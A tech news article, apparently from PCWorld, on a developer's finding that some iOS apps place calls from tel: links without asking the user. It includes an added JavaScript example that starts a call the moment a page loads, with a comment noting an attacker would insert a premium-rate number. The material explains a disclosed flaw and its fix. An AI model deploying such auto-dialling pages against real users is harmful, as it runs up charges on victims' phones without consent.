Andrei Neculaesei, a Copenhagen-based full-stack developer, has thrown his hat into the mobile app security debate by raising concern about poorly implemented handling of URI schemes in many popular apps. Neculaesei argues that because many developers neglect to implement a basic confirmation step in their apps, unwitting users could fall victim to malicious web pages that, in theory, place expensive phone calls from the device being used.
It is highly likely that the majority of mobile app users have triggered a URI scheme at some point during their mobile usage. It is equally likely that individual users do not connect the resulting action with what is going on in the app's underlying code.
URI schemes, such as mailto: and tel:, are frequently used within native mobile apps to trigger a specific action. Examples include tapping an email address to open the Mail app on iOS, or tapping a phone number in Mobile Safari to place a call to that number through the Phone app.
In many parts of iOS, Apple displays a user-facing alert asking for permission before carrying out the action. Tap a phone number in Mobile Safari and you get a prompt asking whether you wish to make the call. It is very much an "opt-in" action, with Apple requiring explicit permission from the user before the call is placed. However, Neculaesei rightly points out that not all developers implement this confirmation step: a number of popular apps, including Facebook Messenger, Apple's own FaceTime and Google's G+ app, place the call without any such prompt.
To prove that this behaviour can be abused, Neculaesei created a web page running some relatively simple JavaScript that initiates a phone call as soon as the page is visited from a mobile phone. The demonstration showed that Facebook's Messenger, among others, would call any number, including expensive premium-rate ones, without asking for any kind of permission from the user. Of course, the device's interface clearly shows the call in progress and the user can cancel it at any time, but it definitely provides food for thought.
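To make the mechanism concrete, here is an added example page in the spirit of the demonstration described above. It is not Neculaesei's code and not taken from the original article; the phone number is a constructed placeholder. The point it illustrates is how little the attacking page has to do: it builds a tel: URI and navigates to it. Nothing in the page can cause a permission prompt; whether the user is asked is decided entirely by the app that receives the URI, which is exactly the check the apps named above were found to skip.

```javascript
// Added example (not from the original article or from Neculaesei's demo):
// a page that attempts to start a phone call the moment it loads.

// Build a tel: URI from a human-readable dial string. Only digits, '+', '*'
// and '#' are kept; visual separators such as spaces, dashes and parentheses
// are dropped so the number is unambiguous to the dialler.
function telUri(dialString) {
  const cleaned = String(dialString).replace(/[^0-9+*#]/g, "");
  if (!/^\+?[0-9*#]+$/.test(cleaned)) {
    throw new Error("not a dialable number: " + dialString);
  }
  return "tel:" + cleaned;
}

// Navigate `target` (normally `window`) to the tel: URI and return it.
// In Mobile Safari this yields the "Call <number>?" prompt; in an app that
// hands tel: links straight to the Phone app, the call simply starts.
// The target is passed in so the function can be exercised without a browser.
function triggerCall(dialString, target) {
  const uri = telUri(dialString);
  target.location.href = uri; // setting the location is all it takes
  return uri;
}

// In a real browser, fire as soon as the page has loaded.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  window.addEventListener("load", function () {
    // Constructed placeholder number for illustration only; an attacker
    // would put a premium-rate number here.
    triggerCall("+1 (555) 010-0000", window);
  });
}
```

The only defence lies on the other side of the scheme handler: the app that receives a tel: (or facetime:) URI should confirm with the user before dialling, exactly as Mobile Safari does, rather than trusting that the page was opened deliberately.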
(via: PCWorld)